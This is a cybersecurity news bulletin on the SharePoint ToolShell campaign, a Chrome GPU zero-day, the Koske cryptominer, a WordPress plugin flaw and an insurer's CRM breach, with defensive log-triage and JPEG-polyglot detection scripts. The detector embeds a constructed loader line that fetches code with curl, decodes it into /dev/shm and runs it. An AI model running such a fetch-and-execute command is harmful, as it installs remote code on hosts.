SparTech Software CyberPulse – Your quick strike cyber update for July 30, 2025 1:21 PM

Microsoft SharePoint Zero-Day Vulnerabilities Lead to Global Compromises

A wave of attacks on on-premises Microsoft SharePoint servers, concentrated in North America and Europe, has become one of July 2025's most urgent security incidents. With more than 400 organizations confirmed affected, including government, finance and healthcare entities, the campaign shows how much sensitive data sits behind a single internet-facing document-management server.

Technical Overview of the Exploit

The chain descends from two flaws demonstrated against SharePoint at the Pwn2Own Berlin contest in May 2025. Microsoft fixed that pair in its July 8 security update, but the variants exploited in the wild (CVE-2025-53770, CVSS 9.8, together with a companion flaw scored 7.1) bypass that fix. The first is an unauthenticated remote code execution bug rooted in unsafe deserialization; the second is a spoofing flaw that lets an attacker reach the vulnerable endpoint without valid credentials. Chained, they give a remote attacker arbitrary code execution on any exposed server, with no account required.

Because the July 8 update was only a partial fix, servers that had applied it were still compromised once exploitation began around July 18; Microsoft then shipped out-of-band updates for SharePoint Subscription Edition, 2019 and 2016. After exploitation, the attackers dropped a web shell (spinstall0.aspx is the most widely reported name) whose job is not to run commands but to read the server's ASP.NET machine keys (ValidationKey and DecryptionKey). With those keys an attacker can sign their own __VIEWSTATE payloads and regain code execution even after the server is patched, which is why key rotation is part of the remediation. Microsoft attributes the campaign, known as "ToolShell", to three China-linked groups: Linen Typhoon, Violet Typhoon and Storm-2603. Storm-2603 has also deployed the Warlock ransomware on compromised systems.

Global Impact and Response

The victim count has climbed steadily: Eye Security's initial internet scan identified more than 75 compromised servers, and subsequent tallies exceed 400 organizations. The affected product is SharePoint Server on-premises; SharePoint Online in Microsoft 365 was not affected, although on-premises farms typically hold the same kind of file shares and document libraries that make SharePoint the backbone of an organization's document management. The US National Nuclear Security Administration was identified as a victim, raising the national-security stakes of the campaign.

Immediate Guidance

The US Cybersecurity and Infrastructure Security Agency (CISA) and Microsoft have both issued urgent remediation guidance. This includes:

  • Applying the July security updates to every supported on-premises SharePoint version (Subscription Edition, 2019 and 2016); older versions receive no fix
  • Enabling AMSI integration in SharePoint with Microsoft Defender Antivirus (or an equivalent engine) on every server
  • Rotating the ASP.NET machine keys and restarting IIS on every server after patching; if keys were already stolen, patching alone leaves forged ViewState payloads valid
  • Disconnecting end-of-life and unsupported SharePoint servers from the internet until they can be migrated
  • Reviewing IIS logs for anomalous POST requests and the LAYOUTS directory for web shells, and treating any server that was exposed before patching as compromised until proven otherwise
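The log and file review in the last step, as an added example rather than Microsoft or CISA tooling: it parses IIS W3C logs with the default field set and looks for the publicly reported ToolShell indicators (an unauthenticated POST to ToolPane.aspx with DisplayMode=Edit and a Referer of /_layouts/SignOut.aspx, followed by access to the spinstall0.aspx web shell). The log lines are constructed for the example; the IP addresses, host names and user names in them are made up.

```python
"""Triage helpers for the ToolShell SharePoint campaign.

Added example, not Microsoft or CISA tooling.  It assumes IIS W3C logs with the
default field set and uses the publicly reported indicators: a POST to
ToolPane.aspx with DisplayMode=Edit whose Referer is /_layouts/SignOut.aspx, and
a spinstall0.aspx (or similarly named) file in the LAYOUTS directory.  The log
excerpt below is constructed for the example.
"""
import re

TOOLPANE_RE = re.compile(r"^/_layouts/1[56]/toolpane\.aspx$", re.IGNORECASE)
SIGNOUT_RE = re.compile(r"/_layouts/(?:1[56]/)?signout\.aspx", re.IGNORECASE)
WEBSHELL_RE = re.compile(r"^spinstall\w*\.aspx$", re.IGNORECASE)

# Constructed IIS log: a normal request, the exploit POST from an external
# address, a follow-up hit on the dropped web shell, and a legitimate
# authenticated ToolPane POST from an intranet page editor.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-18 14:02:11 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\alice 10.0.0.23 Mozilla/5.0+(Windows+NT+10.0) https://sp.corp.example/sites/hr 200 0 0 120
2025-07-18 14:05:40 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) /_layouts/SignOut.aspx 200 0 0 305
2025-07-18 14:05:52 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 42
2025-07-18 14:10:03 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CORP\\bob 10.0.0.31 Mozilla/5.0+(Windows+NT+10.0) https://sp.corp.example/sites/hr/default.aspx 200 0 0 210
"""


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def triage(entries):
    """Return indicator hits, in log order, for the ToolShell exploit chain."""
    hits = []
    for e in entries:
        stem = e.get("cs-uri-stem", "")
        query = e.get("cs-uri-query", "-").lower()
        referer = e.get("cs(Referer)", "-")
        user = e.get("cs-username", "-")
        when = f"{e.get('date', '?')} {e.get('time', '?')}"
        src = e.get("c-ip", "?")
        if e.get("cs-method") == "POST" and TOOLPANE_RE.match(stem) and "displaymode=edit" in query:
            if SIGNOUT_RE.search(referer):
                hits.append({"kind": "toolshell-exploit-attempt", "c-ip": src, "time": when,
                             "detail": f"Referer {referer}"})
            elif user == "-":
                # Later variants changed the Referer; an unauthenticated edit POST to
                # ToolPane.aspx still warrants a look.
                hits.append({"kind": "unauthenticated-toolpane-post", "c-ip": src, "time": when,
                             "detail": "no SignOut.aspx Referer"})
        # Any request for the dropped web shell, authenticated or not, is a hit.
        if WEBSHELL_RE.match(stem.rsplit("/", 1)[-1]):
            hits.append({"kind": "webshell-access", "c-ip": src, "time": when, "detail": stem})
    return hits


def suspicious_layout_files(filenames):
    """Filter a LAYOUTS directory listing (for example os.listdir(...)) for web shell names."""
    return sorted(name for name in filenames if WEBSHELL_RE.match(name))


if __name__ == "__main__":
    for hit in triage(parse_w3c(SAMPLE_LOG)):
        print(f"{hit['time']} {hit['c-ip']:>15} {hit['kind']:<30} {hit['detail']}")
```

Run it against the real files under `C:\inetpub\logs\LogFiles\` and pass `os.listdir()` of the LAYOUTS directory (`...\Web Server Extensions\16\TEMPLATE\LAYOUTS` on 2016 and later) to `suspicious_layout_files`. A clean result does not clear a server: the attackers changed file names and Referers as the campaign progressed, and a stolen machine key leaves no log line of its own, so rotate keys regardless.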

CrowdStrike’s Adam Meyers, quoted on the incident, put it bluntly: “Anybody who’s got a hosted SharePoint server has got a problem.” Enterprise IT teams should treat this as a top priority and assume that any on-premises SharePoint server reachable from the internet before it was patched has already been visited.

Google Chrome ANGLE and GPU Zero-Day Vulnerability Exploited in the Wild

Google’s Threat Analysis Group (TAG) reported, and Google confirmed, in-the-wild exploitation of CVE-2025-6558, an insufficient-validation-of-untrusted-input bug in Chrome’s ANGLE and GPU components. A malicious page can reach the flaw through WebGL, so visiting an attacker-controlled site is enough: no click or download is required.

Details of the Attack Vector

ANGLE translates WebGL calls into native graphics API calls and runs in Chrome’s GPU process, which is less tightly sandboxed than the renderer that parses web content. A bug there is therefore most valuable as a sandbox-escape stage: an attacker who can drive the GPU process from web content, or who already runs code in a renderer, gains a process with far wider access to the operating system. On its own the flaw does not grant OS-level privilege escalation; a full system compromise requires chaining it with further bugs, which is the usual shape of the targeted exploits TAG tracks.

Mitigations and Recommendations

Google fixed the bug in Chrome 138.0.7204.157/.158 for Windows, macOS and Linux and urged all users and organizations to update immediately; chrome://version shows the installed build. Enterprises should verify that managed deployment actually propagates the fix rather than assuming it, especially on kiosk and industrial systems where update policies lag, and should remember that other Chromium-based browsers carry the same ANGLE code and ship their own fixes on their own schedules.

Linux “Koske” Malware: AI-Enhanced Cryptomining via Polyglot JPEG Images

Researchers at Aqua Nautilus have documented a Linux malware family named Koske that hides its payloads in pictures of pandas and mines cryptocurrency on the hosts it infects. Two things make it notable: the images are polyglot files rather than steganography, and the scripts bear the hallmarks of code written with the help of a large language model (tidy structure, verbose comments and defensive checks), a sign of how cheap well-engineered commodity malware has become.

Indicators of Compromise and Technical Analysis

Each Koske image is a valid JPEG of a panda followed, after the end-of-image marker, by a shell script or C source. An image viewer stops at the marker and shows the picture; the loader instead reads the file’s tail and executes it directly in memory, without writing a separate payload file to disk. Two components result: a userland rootkit, a shared library loaded through LD_PRELOAD that hides the mining processes from tools such as ps, and the miner setup itself. Together they let the mining activity survive casual inspection with process listings or signature-based antivirus.

The initial access vector is a misconfigured, internet-exposed JupyterLab instance, potentially via CVE-2025-30370, although that route has not been confirmed. Once inside, the attackers establish persistence and run the miner with a minimal observable footprint.

Preventive Steps for Defenders

  • Never expose JupyterLab or similar data-science notebooks without authentication: require a token or password, bind to localhost or a private network, and put the service behind SSO or a VPN
  • Alert on sustained CPU or GPU saturation, on processes started with LD_PRELOAD set or unexpected entries in /etc/ld.so.preload, and on image files fetched with curl or wget and piped into a shell
  • Layer defences: runtime memory scanning and behavioural detection catch in-memory stages that file-based antivirus never sees, and egress filtering blocks the miner’s connection to its pool
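The polyglot trick described above, and the “suspicious image file” check in the list, as an added example that is not Koske’s code or Aqua’s tooling: a JPEG viewer decodes segments up to the end-of-image marker and ignores everything after it, so the detector walks the segment structure to find the real marker and then inspects whatever trails it. The minimal JPEG and the appended script are constructed here; the URL and paths in the script are made up and nothing in it is executed.

```python
"""Find and classify data appended after a JPEG's end-of-image marker.

Added example, not Koske's code or Aqua's tooling.  A viewer decodes the
segments up to the EOI marker (0xFFD9) and ignores what follows, so a loader
can carry a script in the tail of a perfectly valid picture.  The walk below
follows the segment structure instead of searching for the byte pair 0xFFD9,
which a crafted file could plant early in the image or inside the payload.
The sample image and the appended script are constructed here.
"""
import re
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01, *range(0xD0, 0xD8)}   # TEM and RST0-7 carry no length field

# Cheap textual signs that a trailer is a loader rather than camera metadata.
INDICATORS = {
    "shebang": re.compile(rb"^#!\s*/(?:usr/)?bin/(?:env\s+)?(?:ba|da|z)?sh", re.M),
    "downloader": re.compile(rb"\b(?:curl|wget)\b"),
    "in-memory exec": re.compile(rb"\b(?:eval|exec|nohup)\b|base64 -d|/dev/shm|/dev/fd/"),
    "c-source": re.compile(rb"#include\s*<|\bLD_PRELOAD\b"),
}


def jpeg_trailing_data(data: bytes) -> bytes:
    """Return the bytes after the real EOI marker (empty for a clean file)."""
    if len(data) < 4 or data[0] != 0xFF or data[1] != SOI:
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        while pos + 1 < len(data) and data[pos + 1] == 0xFF:   # fill bytes
            pos += 1
        if pos + 1 >= len(data):
            break
        marker = data[pos + 1]
        if marker == EOI:
            return data[pos + 2:]
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        (seglen,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + seglen
        if marker == SOS:
            # Entropy-coded data: 0xFF is followed by 0x00 (byte stuffing) or by
            # an RSTn marker; anything else is the next real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    raise ValueError("truncated JPEG: no EOI marker")


def analyze(data: bytes) -> dict:
    """Classify a file as clean, carrying benign-looking trailing data, or a polyglot suspect."""
    trailer = jpeg_trailing_data(data)
    found = [name for name, rx in INDICATORS.items() if rx.search(trailer)]
    if found:
        verdict = "polyglot-suspect"
    elif trailer:
        verdict = "trailing-data"   # some cameras and editors append benign trailers
    else:
        verdict = "clean"
    return {"trailing_bytes": len(trailer), "indicators": found, "verdict": verdict}


def _segment(marker: int, body: bytes) -> bytes:
    return bytes([0xFF, marker]) + struct.pack(">H", len(body) + 2) + body


# Constructed, structurally valid JPEG: SOI, JFIF APP0, SOS, entropy-coded bytes
# that include 0xFF00 stuffing and an RST0 marker, then EOI.  It has no frame
# header, so it will not decode to a picture, but every marker walk accepts it.
CLEAN_JPEG = (
    bytes([0xFF, SOI])
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(SOS, b"\x01\x01\x00\x00\x3f\x00")
    + b"\x12\x34\xff\x00\x56\xff\xd0\x78"
    + bytes([0xFF, EOI])
)

# Constructed stand-in for an appended loader; the host and paths are made up.
PAYLOAD = b"""#!/bin/bash
# constructed stand-in for an appended loader; nothing here is executed
curl -s http://203.0.113.7/next.jpg | tail -c +1025 | base64 -d > /dev/shm/.x
nohup bash /dev/shm/.x >/dev/null 2>&1 &
"""

POLYGLOT_JPEG = CLEAN_JPEG + PAYLOAD

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_JPEG), ("polyglot", POLYGLOT_JPEG)):
        print(name, analyze(blob))
```

Point `analyze` at files arriving in download directories, notebook working directories and /tmp. A non-empty trailer alone is only a lead, since some cameras and editing tools append their own data; the combination of a trailer with shell syntax, a downloader and an in-memory execution idiom is what should page someone.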

WordPress Post SMTP Critical Vulnerability—a Widespread Unpatched Risk

A critical vulnerability in Post SMTP, a WordPress plugin used by hundreds of thousands of sites to route outgoing mail through an SMTP provider, has been disclosed while nearly half of its installs remain on a vulnerable version. The plugin is common on business, government and nonprofit sites for transactional messaging, which also makes the email log it keeps a valuable target.

Technical Risk and Exploit Chain

The flaw (CVE-2025-24000, fixed in version 3.3.0) is not a code-execution bug in the plugin itself but broken access control in its REST API: the permission check only verified that the caller was logged in, so any account down to Subscriber level could read the plugin’s email log, including password-reset messages sent to administrators. Requesting a reset for the admin account and lifting the link from the log yields an administrator session, after which code execution follows through ordinary admin capabilities such as installing a plugin or editing a theme file.

Patching and Remediation Urgency

With the vulnerability publicly documented and its only precondition a low-privileged account, administrators should update Post SMTP to 3.3.0 or later, check whether the site allows open registration, and review the email log and recent password-reset activity for signs of abuse, rotating administrator credentials if anything looks wrong. Given how often WordPress serves as an application platform, a compromised site quickly becomes a malware distribution point or a source of customer data from e-commerce and member areas.

Allianz Life Insurance Customer Data Breach in Cloud CRM

Allianz Life Insurance Company of North America confirmed a significant data breach after attackers used social engineering to access and exfiltrate data from a third-party, cloud-based CRM system. The incident exposed personal information for the majority of its 1.4 million US customers, as well as financial professionals and select employees.

Attack Vector and Impact

On July 16, attackers manipulated helpdesk agents into resetting multi-factor authentication and issuing new credentials, bypassing the normal identity checks. That gave them authenticated access to sensitive customer records in the CRM.

The company has begun notifying affected individuals and has informed law enforcement, including the FBI. There is currently no evidence that the attackers moved beyond the CRM into Allianz’s broader network, but regulatory reporting and state-level notifications are under way.

Lessons and Next Steps

The breach shows that the weakest identity control is often a support conversation rather than a login form, even at large enterprises. MFA and credential resets should require verification an attacker cannot satisfy over the phone: a callback to a number already on file, manager or identity-proofing approval for privileged accounts, and a delay before a newly enrolled factor can reach sensitive SaaS data. Help desks need scripted refusal paths and training against pressure tactics, and access to customer-data platforms should be monitored in real time for new authentication factors, unusual export volumes and logins from unfamiliar locations.
